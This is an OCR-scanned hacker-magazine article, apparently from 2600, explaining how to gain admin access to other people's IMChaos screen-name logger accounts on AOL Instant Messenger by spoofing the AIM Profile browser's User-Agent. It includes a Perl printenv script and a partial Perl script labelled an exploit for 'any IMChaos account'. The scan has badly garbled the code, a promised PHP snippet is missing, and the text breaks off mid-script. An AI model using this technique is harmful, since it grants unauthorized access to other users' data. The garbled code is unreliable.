2600 P.O. Box 752 Middle Island. NY 1 1953 USA
by Stik
As an AOL Instant Messenger user, you are probably familiar with IMChaos.com. the site
known for its unique screen name loggers. To make and use your own. you choose what type of
logger you want from their site; Simple List, Profile Pic, Spy Survey... all offered options will
work. You fill out the required forms then copy and paste your personally generated hyperlink to
your profile. Your friends will see the link in your profile, click it, and it will add their screen
name to the list of others who clicked the link.
On older IMChaos loggers, you were able to gain admin access by copying the hyperlink url
from the AIM Profile window and pasting it into your browser address bar and changing your
screen name to the profile holder's screen name. With admin access you can delete, edit, and view
detailed info about the visitors.
Once this technique stopped working, I started to think about what the problem could be and
what they could have changed to prevent this from functioning. I knew it worked in the AIM
Profile window, but not Internet Explorer or any other browser I tried. I used a small script to grab
the environment variables out of the current browser, so I could compare the results from Internet
Explorer with those from the AIM Profile.
# ! /usr/bin/perl
##
## printenv -- demo CGI program which just prints its environment
##
print ” Content- type : text/plain\n\n" ;
foreach $var (sort (keys (%ENV) ) ) {
$val - $ENV{$var};
$val — s I \nj \\n| g;
$val =- s [ " | \\" |g;
print "${var}=\"${val}\"\n" ;
}
I then noticed the difference in UserAgent strings and came to the conclusion that the php
script they use on their site must have a line of code that looks something like this:
I decided to test my theory by writing a script to spoof the AIM Profile window using Perl,
emulating the AIM Profile browser by using its UserAgent in my attempt to reach the admin page.
Just as I thought, the site only works properly for the AIM Profile browser, and now, any browser
using my script. My code is listed below. I commented it heavily for this article so you can un-
derstand what is going on. If you decide to try to run this code, make sure it is on a machine sup-
porting perl/cgi with the modules HTTP: Request and LWP: UserAgent installed (which are easily
obtained for free at cpan.org if you do not have them). Once you become comfortable with the
code feel free to add on to it and make it better.
## IMChaos . cgi
tttt Exploit to gain admin access to any IMChaos account
Hi) Spoofs the AIM Browser Window
tt tt Written by; Stik
i use HTTP :: Request ;
Magazine-
use LWP; : User Agent ;
## Includes the above modules to be used in the script
print "Content -type : text/html\n\n" ;
## To output as an HTML Page, this is necessary
$agent = 'AIM/30 (Mozilla 1.24b; Windows; I; 32-bit)';
## Use rAgent String of the AIM Window
$tmp = $ENV ( ' QUERY_STRING ' ) ;
## URL of the hyperlink clicked, blank if no hyperlink was clicked
if ($tmp ne "") {
## The following keeps the browser spoofed when hyperlinks are clicked
$tmp =~ s/link=//g;
tilt Removes the word " link* " from the URL of the clicked hyperlink
$listurll = $tmp;
## URL of the clicked hyperlink
$ua = new LWP; ;UserAgent agent=>$agent, env_proxy=>l ;
U# Spoof the AIM Profile UserAgent as the UA of the current browser
$req uest = HTTP: : Request ->new (GET => "$listurll ") ;
$content = $ua->request (Srequest) ->content;
## Request the HTML of $listurll , the clicked hyperlinked page
print "$content